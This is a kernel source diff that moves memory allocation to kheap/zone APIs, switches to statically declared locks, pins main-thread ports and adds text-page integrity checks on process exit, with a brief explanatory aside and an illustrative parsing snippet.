-       MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO);
+       bufp = kheap_alloc(KHEAP_TEMP,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO);
        imgp = (struct image_params *) bufp;
        if (bufp == NULL) {
                error = ENOMEM;
@@ -4794,9 +4812,8 @@ exit_with_error:
                proc_rele(p);
        }
 
-       if (bufp != NULL) {
-               FREE(bufp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, bufp,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap));
 
        if (inherit != NULL) {
                ipc_importance_release(inherit);
@@ -5396,10 +5413,12 @@ extern uuid_string_t bootsessionuuid_string;
 #define PTRAUTH_DISABLED_FLAG "ptrauth_disabled=1"
 #define DYLD_ARM64E_ABI_KEY "arm64e_abi="
 #endif /* __has_feature(ptrauth_calls) */
+#define MAIN_TH_PORT_KEY "th_port="
 
 #define FSID_MAX_STRING "0x1234567890abcdef,0x1234567890abcdef"
 
 #define HEX_STR_LEN 18 // 64-bit hex value "0x0123456701234567"
+#define HEX_STR_LEN32 10 // 32-bit hex value "0x01234567"
 
 static int
 exec_add_entropy_key(struct image_params *imgp,
@@ -5453,6 +5472,8 @@ exec_add_apple_strings(struct image_params *imgp,
 {
        int error;
        int img_ptr_size = (imgp->ip_flags & IMGPF_IS_64BIT_ADDR) ? 8 : 4;
+       thread_t new_thread;
+       ipc_port_t sright;
 
        /* exec_save_path stored the first string */
        imgp->ip_applec = 1;
@@ -5658,6 +5679,26 @@ exec_add_apple_strings(struct image_params *imgp,
                imgp->ip_applec++;
        }
 #endif
+       /*
+        * Add the main thread's mach port name.
+        * This takes a +1 uref on the main thread port; the ref is extracted by libpthread in
+        * __pthread_init and consumed in _bsdthread_terminate. The port name is leaked if the
+        * process is not linked against libpthread.
+        */
+       if ((new_thread = imgp->ip_new_thread) != THREAD_NULL) {
+               thread_reference(new_thread);
+               sright = convert_thread_to_port_pinned(new_thread);
+               task_t new_task = get_threadtask(new_thread);
+               mach_port_name_t name = ipc_port_copyout_send(sright, get_task_ipcspace(new_task));
+               char port_name_hex_str[strlen(MAIN_TH_PORT_KEY) + HEX_STR_LEN32 + 1];
+               snprintf(port_name_hex_str, sizeof(port_name_hex_str), MAIN_TH_PORT_KEY "0x%x", name);
+
+               error = exec_add_user_string(imgp, CAST_USER_ADDR_T(port_name_hex_str), UIO_SYSSPACE, FALSE);
+               if (error) {
+                       goto bad;
+               }
+               imgp->ip_applec++;
+       }
 
        /* Align the tail of the combined applev area */
        while (imgp->ip_strspace % img_ptr_size != 0) {
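The hunk above publishes the pinned main-thread port name to user space as an apple-array entry of the form th_port=0x<name> (HEX_STR_LEN32 covers "0x" plus eight hex digits). Purely as a hypothetical illustration of the consumer side, not code from this patch or from libpthread, a runtime could recover the name like this:

    #include <mach/mach.h>
    #include <stdlib.h>
    #include <string.h>

    /* Hypothetical consumer: scan the apple strings for "th_port=0x...". */
    static mach_port_name_t
    main_thread_port_from_apple(const char *const *apple)
    {
            const char *key = "th_port=";

            for (size_t i = 0; apple[i] != NULL; i++) {
                    if (strncmp(apple[i], key, strlen(key)) == 0) {
                            /* base 16 accepts the leading "0x" */
                            return (mach_port_name_t)strtoul(apple[i] + strlen(key), NULL, 16);
                    }
            }
            return MACH_PORT_NULL;
    }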
@@ -6053,7 +6094,8 @@ handle_mac_transition:
                                        continue;
                                }
 
-                               MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO);
+                               ndp = kheap_alloc(KHEAP_TEMP,
+                                   sizeof(*ndp), Z_WAITOK | Z_ZERO);
                                if (ndp == NULL) {
                                        fp_free(p, indx, fp);
                                        error = ENOMEM;
@@ -6066,7 +6108,7 @@ handle_mac_transition:
 
                                if ((error = vn_open(ndp, flag, 0)) != 0) {
                                        fp_free(p, indx, fp);
-                                       FREE(ndp, M_TEMP);
+                                       kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp));
                                        break;
                                }
 
@@ -6083,7 +6125,7 @@ handle_mac_transition:
                                fp_drop(p, indx, fp, 1);
                                proc_fdunlock(p);
 
-                               FREE(ndp, M_TEMP);
+                               kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp));
                        }
                }
        }
@@ -6537,24 +6579,24 @@ load_return_to_errno(load_return_t lrtn)
 
 
 static int execargs_waiters = 0;
-lck_mtx_t *execargs_cache_lock;
+static LCK_MTX_DECLARE_ATTR(execargs_cache_lock, &proc_lck_grp, &proc_lck_attr);
 
 static void
 execargs_lock_lock(void)
 {
-       lck_mtx_lock_spin(execargs_cache_lock);
+       lck_mtx_lock_spin(&execargs_cache_lock);
 }
 
 static void
 execargs_lock_unlock(void)
 {
-       lck_mtx_unlock(execargs_cache_lock);
+       lck_mtx_unlock(&execargs_cache_lock);
 }
 
 static wait_result_t
 execargs_lock_sleep(void)
 {
-       return lck_mtx_sleep(execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE);
+       return lck_mtx_sleep(&execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE);
 }
 
 static kern_return_t
index c38e6a898048958db26776e01fa875d69314eeb0..e9dc75475b31068fdf2c89e86915f3e62d3c92c4 100644 (file)
 #include <kern/assert.h>
 #include <kern/policy_internal.h>
 #include <kern/exc_guard.h>
+#include <kern/backtrace.h>
 
 #include <vm/vm_protos.h>
 #include <os/log.h>
@@ -935,8 +936,7 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate,
                os_reason_free(exit_reason);
                if (current_proc() == p) {
                        if (p->exit_thread == self) {
-                               printf("exit_thread failed to exit, leaving process %s[%d] in unkillable limbo\n",
-                                   p->p_comm, p->p_pid);
+                               panic("exit_thread failed to exit");
                        }
 
                        if (thread_can_terminate) {
@@ -1004,10 +1004,10 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate,
 static void
 proc_memorystatus_remove(proc_t p)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED);
        while (memorystatus_remove(p) == EAGAIN) {
                os_log(OS_LOG_DEFAULT, "memorystatus_remove: Process[%d] tried to exit while being frozen. Blocking exit until freeze completes.", p->p_pid);
-               msleep(&p->p_memstat_state, proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL);
+               msleep(&p->p_memstat_state, &proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL);
        }
 }
 #endif
@@ -1069,6 +1069,58 @@ proc_prepareexit(proc_t p, int rv, boolean_t perf_notify)
                if (kr != 0) {
                        create_corpse = TRUE;
                }
+
+               /*
+                * Revalidate the code signing of the text pages around the current PC.
+                * This is an attempt to detect and repair faults due to memory
+                * corruption of text pages.
+                *
+                * The goal here is to fix up infrequent memory corruptions due to
+                * things like aging RAM bit flips. So the approach is to only expect
+                * to have to fix up one thing per crash. This also limits the amount
+                * of extra work we cause in case this is a development kernel with an
+                * active memory stomp happening.
+                */
+               task_t task = proc_task(p);
+               uintptr_t bt[2];
+               int bt_err;
+               bool user64;
+               bool was_truncated;
+               unsigned int frame_count = backtrace_user(bt, 2, &bt_err, &user64, &was_truncated);
+
+               if (bt_err == 0 && frame_count >= 1) {
+                       /*
+                        * First check at the page containing the current PC.
+                        * This passes if the page code signs -or- if we can't figure out
+                        * what is at that address. The latter case is allowed so that we continue
+                        * checking previous pages, which may be corrupt and have caused a wild branch.
+                        */
+                       kr = revalidate_text_page(task, bt[0]);
+
+                       /* No corruption found, check the previous sequential page */
+                       if (kr == KERN_SUCCESS) {
+                               kr = revalidate_text_page(task, bt[0] - get_task_page_size(task));
+                       }
+
+                       /* Still no corruption found, check the current function's caller */
+                       if (kr == KERN_SUCCESS) {
+                               if (frame_count > 1 &&
+                                   atop(bt[0]) != atop(bt[1]) &&           /* don't recheck PC page */
+                                   atop(bt[0]) - 1 != atop(bt[1])) {       /* don't recheck page before */
+                                       kr = revalidate_text_page(task, (vm_map_offset_t)bt[1]);
+                               }
+                       }
+
+                       /*
+                        * Log that we found a corruption.
+                        * TBD: figure out how to bubble this up to the crash reporter too,
+                        * instead of just the log message.
+                        */
+                       if (kr != KERN_SUCCESS) {
+                               os_log(OS_LOG_DEFAULT,
+                                   "Text page corruption detected in dying process %d\n", p->p_pid);
+                       }
+               }
        }
 
 skipcheck:
@@ -1389,7 +1441,7 @@ proc_exit(proc_t p)
                        }
                        /* check for sysctl zomb lookup */
                        while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                               msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                               msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                        }
                        q->p_listflag |= P_LIST_WAITING;
                        /*
@@ -1630,7 +1682,7 @@ proc_exit(proc_t p)
                    pid, exitval, 0, 0, 0);
                /* check for sysctl zomb lookup */
                while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                       msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                       msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                }
                /* safe to use p as this is a system reap */
                p->p_stat = SZOMB;
@@ -1843,13 +1895,14 @@ reap_child_locked(proc_t parent, proc_t child, int deadparent, int reparentedtoi
                child->p_ucred = NOCRED;
        }
 
-       lck_mtx_destroy(&child->p_mlock, proc_mlock_grp);
-       lck_mtx_destroy(&child->p_ucred_mlock, proc_ucred_mlock_grp);
-       lck_mtx_destroy(&child->p_fdmlock, proc_fdmlock_grp);
+       lck_mtx_destroy(&child->p_mlock, &proc_mlock_grp);
+       lck_mtx_destroy(&child->p_ucred_mlock, &proc_ucred_mlock_grp);
+       lck_mtx_destroy(&child->p_fdmlock, &proc_fdmlock_grp);
 #if CONFIG_DTRACE
-       lck_mtx_destroy(&child->p_dtrace_sprlock, proc_lck_grp);
+       lck_mtx_destroy(&child->p_dtrace_sprlock, &proc_lck_grp);
 #endif
-       lck_spin_destroy(&child->p_slock, proc_slock_grp);
+       lck_spin_destroy(&child->p_slock, &proc_slock_grp);
+       lck_rw_destroy(&child->p_dirs_lock, &proc_dirslock_grp);
 
        zfree(proc_zone, child);
        if ((locked == 1) && (droplock == 0)) {
@@ -1935,7 +1988,7 @@ loop1:
                        wait4_data->args = uap;
                        thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess);
 
-                       (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                       (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                        goto loop1;
                }
                p->p_listflag |= P_LIST_WAITING;   /* only allow single thread to wait() */
@@ -2080,7 +2133,7 @@ loop1:
        wait4_data->retval = retval;
 
        thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess);
-       if ((error = msleep0((caddr_t)q, proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) {
+       if ((error = msleep0((caddr_t)q, &proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) {
                return error;
        }
 
@@ -2199,7 +2252,7 @@ loop1:
                 * the single return for waited process guarantee.
                 */
                if (p->p_listflag & P_LIST_WAITING) {
-                       (void) msleep(&p->p_stat, proc_list_mlock,
+                       (void) msleep(&p->p_stat, &proc_list_mlock,
                            PWAIT, "waitidcoll", 0);
                        goto loop1;
                }
@@ -2327,14 +2380,14 @@ loop1:
                        }
                        goto out;
                }
-               ASSERT_LCK_MTX_OWNED(proc_list_mlock);
+               ASSERT_LCK_MTX_OWNED(&proc_list_mlock);
 
                /* Not a process we are interested in; go on to next child */
 
                p->p_listflag &= ~P_LIST_WAITING;
                wakeup(&p->p_stat);
        }
-       ASSERT_LCK_MTX_OWNED(proc_list_mlock);
+       ASSERT_LCK_MTX_OWNED(&proc_list_mlock);
 
        /* No child processes that could possibly satisfy the request? */
 
@@ -2368,7 +2421,7 @@ loop1:
        waitid_data->args = uap;
        waitid_data->retval = retval;
 
-       if ((error = msleep0(q, proc_list_mlock,
+       if ((error = msleep0(q, &proc_list_mlock,
            PWAIT | PCATCH | PDROP, "waitid", 0, waitidcontinue)) != 0) {
                return error;
        }
@@ -2562,7 +2615,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit)
                        }
                        /* check for lookups by zomb sysctl */
                        while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                               msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                               msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                        }
                        q->p_listflag |= P_LIST_WAITING;
                        /*
@@ -2725,8 +2778,9 @@ vfork_exit_internal(proc_t p, int rv, int forceexit)
        zfree(proc_sigacts_zone, p->p_sigacts);
        p->p_sigacts = NULL;
 
-       FREE(p->p_subsystem_root_path, M_SBUF);
-       p->p_subsystem_root_path = NULL;
+       if (p->p_subsystem_root_path) {
+               zfree(ZV_NAMEI, p->p_subsystem_root_path);
+       }
 
        proc_limitdrop(p);
 
@@ -2775,7 +2829,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit)
                proc_list_lock();
                /* check for lookups by zomb sysctl */
                while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) {
-                       msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0);
+                       msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0);
                }
                p->p_stat = SZOMB;
                p->p_listflag |= P_LIST_WAITING;
index b9475aed173be24b21325010f7b4aa4be632270c..e48cffe6d0d0bade3c25c4d0d28fb14b1a4e0686 100644 (file)
@@ -841,12 +841,13 @@ fork_create_child(task_t parent_task,
        }
 
        /*
-        * Create a new thread for the child process
+        * Create a new thread for the child process. Pin it and make it immovable.
         * The new thread is waiting on the event triggered by 'task_clear_return_wait'
         */
        result = thread_create_waiting(child_task,
            (thread_continue_t)task_wait_to_return,
            task_get_return_wait_event(child_task),
+           TH_CREATE_WAITING_OPTION_PINNED | TH_CREATE_WAITING_OPTION_IMMOVABLE,
            &child_thread);
 
        if (result != KERN_SUCCESS) {
@@ -1124,13 +1125,14 @@ forkproc_free(proc_t p)
        /* Update the audit session proc count */
        AUDIT_SESSION_PROCEXIT(p);
 
-       lck_mtx_destroy(&p->p_mlock, proc_mlock_grp);
-       lck_mtx_destroy(&p->p_fdmlock, proc_fdmlock_grp);
-       lck_mtx_destroy(&p->p_ucred_mlock, proc_ucred_mlock_grp);
+       lck_mtx_destroy(&p->p_mlock, &proc_mlock_grp);
+       lck_mtx_destroy(&p->p_fdmlock, &proc_fdmlock_grp);
+       lck_mtx_destroy(&p->p_ucred_mlock, &proc_ucred_mlock_grp);
 #if CONFIG_DTRACE
-       lck_mtx_destroy(&p->p_dtrace_sprlock, proc_lck_grp);
+       lck_mtx_destroy(&p->p_dtrace_sprlock, &proc_lck_grp);
 #endif
-       lck_spin_destroy(&p->p_slock, proc_slock_grp);
+       lck_spin_destroy(&p->p_slock, &proc_slock_grp);
+       lck_rw_destroy(&p->p_dirs_lock, &proc_dirslock_grp);
 
        /* Release the credential reference */
        kauth_cred_t tmp_ucred = p->p_ucred;
@@ -1153,8 +1155,9 @@ forkproc_free(proc_t p)
        p->p_sigacts = NULL;
        zfree(proc_stats_zone, p->p_stats);
        p->p_stats = NULL;
-       FREE(p->p_subsystem_root_path, M_SBUF);
-       p->p_subsystem_root_path = NULL;
+       if (p->p_subsystem_root_path) {
+               zfree(ZV_NAMEI, p->p_subsystem_root_path);
+       }
 
        proc_checkdeadrefs(p);
        zfree(proc_zone, p);
@@ -1317,13 +1320,14 @@ retry:
        /* update audit session proc count */
        AUDIT_SESSION_PROCNEW(child_proc);
 
-       lck_mtx_init(&child_proc->p_mlock, proc_mlock_grp, proc_lck_attr);
-       lck_mtx_init(&child_proc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr);
-       lck_mtx_init(&child_proc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr);
+       lck_mtx_init(&child_proc->p_mlock, &proc_mlock_grp, &proc_lck_attr);
+       lck_mtx_init(&child_proc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr);
+       lck_mtx_init(&child_proc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr);
 #if CONFIG_DTRACE
-       lck_mtx_init(&child_proc->p_dtrace_sprlock, proc_lck_grp, proc_lck_attr);
+       lck_mtx_init(&child_proc->p_dtrace_sprlock, &proc_lck_grp, &proc_lck_attr);
 #endif
-       lck_spin_init(&child_proc->p_slock, proc_slock_grp, proc_lck_attr);
+       lck_spin_init(&child_proc->p_slock, &proc_slock_grp, &proc_lck_attr);
+       lck_rw_init(&child_proc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr);
 
        klist_init(&child_proc->p_klist);
 
@@ -1348,7 +1352,6 @@ retry:
         *
         * XXX may fail to copy descriptors to child
         */
-       lck_rw_init(&child_proc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr);
        child_proc->p_fd = fdcopy(parent_proc, parent_uthread->uu_cdir);
 
 #if SYSV_SHM
@@ -1462,7 +1465,9 @@ retry:
 
        if (parent_proc->p_subsystem_root_path) {
                size_t parent_length = strlen(parent_proc->p_subsystem_root_path) + 1;
-               MALLOC(child_proc->p_subsystem_root_path, char *, parent_length, M_SBUF, M_WAITOK | M_ZERO);
+               assert(parent_length <= MAXPATHLEN);
+               child_proc->p_subsystem_root_path = zalloc_flags(ZV_NAMEI,
+                   Z_WAITOK | Z_ZERO);
                memcpy(child_proc->p_subsystem_root_path, parent_proc->p_subsystem_root_path, parent_length);
        }
 
@@ -1473,7 +1478,7 @@ bad:
 void
 proc_lock(proc_t p)
 {
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
        lck_mtx_lock(&p->p_mlock);
 }
 
@@ -1486,7 +1491,7 @@ proc_unlock(proc_t p)
 void
 proc_spinlock(proc_t p)
 {
-       lck_spin_lock_grp(&p->p_slock, proc_slock_grp);
+       lck_spin_lock_grp(&p->p_slock, &proc_slock_grp);
 }
 
 void
@@ -1498,13 +1503,13 @@ proc_spinunlock(proc_t p)
 void
 proc_list_lock(void)
 {
-       lck_mtx_lock(proc_list_mlock);
+       lck_mtx_lock(&proc_list_mlock);
 }
 
 void
 proc_list_unlock(void)
 {
-       lck_mtx_unlock(proc_list_mlock);
+       lck_mtx_unlock(&proc_list_mlock);
 }
 
 void
@@ -1634,7 +1639,6 @@ uthread_cleanup_name(void *uthread)
 void
 uthread_cleanup(task_t task, void *uthread, void * bsd_info)
 {
-       struct _select *sel;
        uthread_t uth = (uthread_t)uthread;
        proc_t p = (proc_t)bsd_info;
 
@@ -1669,12 +1673,8 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info)
                kqueue_threadreq_unbind(p, uth->uu_kqr_bound);
        }
 
-       sel = &uth->uu_select;
-       /* cleanup the select bit space */
-       if (sel->nbytes) {
-               FREE(sel->ibits, M_TEMP);
-               FREE(sel->obits, M_TEMP);
-               sel->nbytes = 0;
+       if (uth->uu_select.nbytes) {
+               select_cleanup_uthread(&uth->uu_select);
        }
 
        if (uth->uu_cdir) {
@@ -1686,7 +1686,7 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info)
                if (waitq_set_is_valid(uth->uu_wqset)) {
                        waitq_set_deinit(uth->uu_wqset);
                }
-               FREE(uth->uu_wqset, M_SELECT);
+               kheap_free(KHEAP_DEFAULT, uth->uu_wqset, uth->uu_wqstate_sz);
                uth->uu_wqset = NULL;
                uth->uu_wqstate_sz = 0;
        }
index 6827a927fad9b69e3fdc6032e7d5cd21fa946c0b..8fc2889fd579ca7623c44c7e323c6476e84b3381 100644 (file)
@@ -1006,8 +1006,8 @@ free_vgo(struct vng_owner *vgo)
 }
 
 static int label_slot;
-static lck_rw_t llock;
-static lck_grp_t *llock_grp;
+static LCK_GRP_DECLARE(llock_grp, VNG_POLICY_NAME);
+static LCK_RW_DECLARE(llock, &llock_grp);
 
 static __inline void *
 vng_lbl_get(struct label *label)
@@ -1413,7 +1413,9 @@ vng_guard_violation(const struct vng_info *vgi,
                if (vng_policy_flags & kVNG_POLICY_EXC_CORPSE) {
                        char *path;
                        int len = MAXPATHLEN;
-                       MALLOC(path, char *, len, M_TEMP, M_WAITOK);
+
+                       path = zalloc(ZV_NAMEI);
+
                        os_reason_t r = NULL;
                        if (NULL != path) {
                                vn_getpath(vp, path, &len);
@@ -1425,9 +1427,8 @@ vng_guard_violation(const struct vng_info *vgi,
                        if (NULL != r) {
                                os_reason_free(r);
                        }
-                       if (NULL != path) {
-                               FREE(path, M_TEMP);
-                       }
+
+                       zfree(ZV_NAMEI, path);
                } else {
                        thread_t t = current_thread();
                        thread_guard_violation(t, code, subcode, TRUE);
@@ -1623,13 +1624,6 @@ vng_vnode_check_open(kauth_cred_t cred,
  * Configuration gorp
  */
 
-static void
-vng_init(struct mac_policy_conf *mpc)
-{
-       llock_grp = lck_grp_alloc_init(mpc->mpc_name, LCK_GRP_ATTR_NULL);
-       lck_rw_init(&llock, llock_grp, LCK_ATTR_NULL);
-}
-
 SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = {
        .mpo_file_label_destroy = vng_file_label_destroy,
 
@@ -1642,7 +1636,6 @@ SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = {
        .mpo_vnode_check_open = vng_vnode_check_open,
 
        .mpo_policy_syscall = vng_policy_syscall,
-       .mpo_policy_init = vng_init,
 };
 
 static const char *vng_labelnames[] = {
index e60018e65ba849f1109c799e1429286e92cbae14..55dc92a99f896003ff304ece29bd0754e5c32c07 100644 (file)
@@ -62,9 +62,8 @@ typedef int (*setint_t)(int);
 
 static int kpc_initted = 0;
 
-static lck_grp_attr_t *sysctl_lckgrp_attr = NULL;
-static lck_grp_t *sysctl_lckgrp = NULL;
-static lck_mtx_t sysctl_lock;
+static LCK_GRP_DECLARE(sysctl_lckgrp, "kpc");
+static LCK_MTX_DECLARE(sysctl_lock, &sysctl_lckgrp);
 
 /*
  * Another element is needed to hold the CPU number when getting counter values.
@@ -76,10 +75,6 @@ typedef int (*setget_func_t)(int);
 void
 kpc_init(void)
 {
-       sysctl_lckgrp_attr = lck_grp_attr_alloc_init();
-       sysctl_lckgrp = lck_grp_alloc_init("kpc", sysctl_lckgrp_attr);
-       lck_mtx_init(&sysctl_lock, sysctl_lckgrp, LCK_ATTR_NULL);
-
        kpc_arch_init();
 
        kpc_initted = 1;
index c36219ae7aed3098cb1f9a81507c5894bddd6a9a..3f2a7ef0f9b28f940ba85ed97de02f3dac91f686 100644 (file)
@@ -70,7 +70,8 @@ char *proc_name_address(void *p);
 
 kern_return_t ktrace_background_available_notify_user(void);
 
-static lck_mtx_t *ktrace_mtx;
+static LCK_GRP_DECLARE(ktrace_grp, "ktrace");
+static LCK_MTX_DECLARE(ktrace_mtx, &ktrace_grp);
 
 /*
  * The overall state of ktrace, whether it is unconfigured, in foreground mode,
@@ -148,7 +149,7 @@ void
 ktrace_lock(void)
 {
        if (!ktrace_single_threaded) {
-               lck_mtx_lock(ktrace_mtx);
+               lck_mtx_lock(&ktrace_mtx);
        }
 }
 
@@ -156,7 +157,7 @@ void
 ktrace_unlock(void)
 {
        if (!ktrace_single_threaded) {
-               lck_mtx_unlock(ktrace_mtx);
+               lck_mtx_unlock(&ktrace_mtx);
        }
 }
 
@@ -164,7 +165,7 @@ void
 ktrace_assert_lock_held(void)
 {
        if (!ktrace_single_threaded) {
-               lck_mtx_assert(ktrace_mtx, LCK_MTX_ASSERT_OWNED);
+               lck_mtx_assert(&ktrace_mtx, LCK_MTX_ASSERT_OWNED);
        }
 }
 
@@ -548,24 +549,3 @@ out:
        ktrace_unlock();
        return ret;
 }
-
-/* This should only be called from the bootstrap thread. */
-void
-ktrace_init(void)
-{
-       static lck_grp_attr_t *lock_grp_attr = NULL;
-       static lck_grp_t *lock_grp = NULL;
-       static bool initialized = false;
-
-       if (initialized) {
-               return;
-       }
-
-       lock_grp_attr = lck_grp_attr_alloc_init();
-       lock_grp = lck_grp_alloc_init("ktrace", lock_grp_attr);
-       lck_grp_attr_free(lock_grp_attr);
-
-       ktrace_mtx = lck_mtx_alloc_init(lock_grp, LCK_ATTR_NULL);
-       assert(ktrace_mtx != NULL);;
-       initialized = true;
-}
index 03f86bef2ab9b6e6bfec2f5ccedca0832fa46af6..18e372d11c689ebc67546846b61954fecf5ffbce 100644 (file)
@@ -117,7 +117,11 @@ SYSCTL_INT(_debug, OID_AUTO, lockf_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &lockf_de
 #define LOCKF_DEBUG(mask, ...)          /* mask */
 #endif  /* !LOCKF_DEBUGGING */
 
-MALLOC_DEFINE(M_LOCKF, "lockf", "Byte-range locking structures");
+/*
+ * If you need accounting for KM_LOCKF consider using
+ * ZONE_VIEW_DEFINE to define a view.
+ */
+#define KM_LOCKF       KHEAP_DEFAULT
 
 #define NOLOCKF (struct lockf *)0
 #define SELF    0x1
@@ -152,15 +156,8 @@ static void      lf_boost_blocking_proc(struct lockf *, struct lockf *);
 static void      lf_adjust_assertion(struct lockf *block);
 #endif /* IMPORTANCE_INHERITANCE */
 
-static lck_mtx_t lf_dead_lock;
-static lck_grp_t *lf_dead_lock_grp;
-
-void
-lf_init(void)
-{
-       lf_dead_lock_grp = lck_grp_alloc_init("lf_dead_lock", LCK_GRP_ATTR_NULL);
-       lck_mtx_init(&lf_dead_lock, lf_dead_lock_grp, LCK_ATTR_NULL);
-}
+static LCK_GRP_DECLARE(lf_dead_lock_grp, "lf_dead_lock");
+static LCK_MTX_DECLARE(lf_dead_lock, &lf_dead_lock_grp);
 
 /*
  * lf_advlock
@@ -285,7 +282,7 @@ lf_advlock(struct vnop_advlock_args *ap)
        /*
         * Create the lockf structure
         */
-       MALLOC(lock, struct lockf *, sizeof *lock, M_LOCKF, M_WAITOK);
+       lock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK);
        if (lock == NULL) {
                return ENOLCK;
        }
@@ -336,21 +333,21 @@ lf_advlock(struct vnop_advlock_args *ap)
 
        case F_UNLCK:
                error = lf_clearlock(lock);
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                break;
 
        case F_GETLK:
                error = lf_getlock(lock, fl, -1);
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                break;
 
        case F_GETLKPID:
                error = lf_getlock(lock, fl, fl->l_pid);
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                break;
 
        default:
-               FREE(lock, M_LOCKF);
+               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                error = EINVAL;
                break;
        }
@@ -451,7 +448,7 @@ lf_coalesce_adjacent(struct lockf *lock)
 
                        lf_move_blocked(lock, adjacent);
 
-                       FREE(adjacent, M_LOCKF);
+                       kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf));
                        continue;
                }
                /* If the lock starts adjacent to us, we can coalesce it */
@@ -466,7 +463,7 @@ lf_coalesce_adjacent(struct lockf *lock)
 
                        lf_move_blocked(lock, adjacent);
 
-                       FREE(adjacent, M_LOCKF);
+                       kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf));
                        continue;
                }
 
@@ -538,7 +535,7 @@ scan:
                 */
                if ((lock->lf_flags & F_WAIT) == 0) {
                        DTRACE_FSINFO(advlock__nowait, vnode_t, vp);
-                       FREE(lock, M_LOCKF);
+                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                        return EAGAIN;
                }
 
@@ -676,7 +673,7 @@ scan:
                                                LOCKF_DEBUG(LF_DBG_DEADLOCK, "lock %p which is me, so EDEADLK\n", lock);
                                                proc_unlock(wproc);
                                                lck_mtx_unlock(&lf_dead_lock);
-                                               FREE(lock, M_LOCKF);
+                                               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                                return EDEADLK;
                                        }
                                }
@@ -695,7 +692,7 @@ scan:
                    lock->lf_type == F_WRLCK) {
                        lock->lf_type = F_UNLCK;
                        if ((error = lf_clearlock(lock)) != 0) {
-                               FREE(lock, M_LOCKF);
+                               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                return error;
                        }
                        lock->lf_type = F_WRLCK;
@@ -799,7 +796,7 @@ scan:
                        if (!TAILQ_EMPTY(&lock->lf_blkhd)) {
                                lf_wakelock(lock, TRUE);
                        }
-                       FREE(lock, M_LOCKF);
+                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                        /* Return ETIMEDOUT if timeout occurred. */
                        if (error == EWOULDBLOCK) {
                                error = ETIMEDOUT;
@@ -852,7 +849,7 @@ scan:
                        }
                        overlap->lf_type = lock->lf_type;
                        lf_move_blocked(overlap, lock);
-                       FREE(lock, M_LOCKF);
+                       kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                        lock = overlap; /* for lf_coalesce_adjacent() */
                        break;
 
@@ -862,7 +859,7 @@ scan:
                         */
                        if (overlap->lf_type == lock->lf_type) {
                                lf_move_blocked(overlap, lock);
-                               FREE(lock, M_LOCKF);
+                               kheap_free(KM_LOCKF, lock, sizeof(struct lockf));
                                lock = overlap; /* for lf_coalesce_adjacent() */
                                break;
                        }
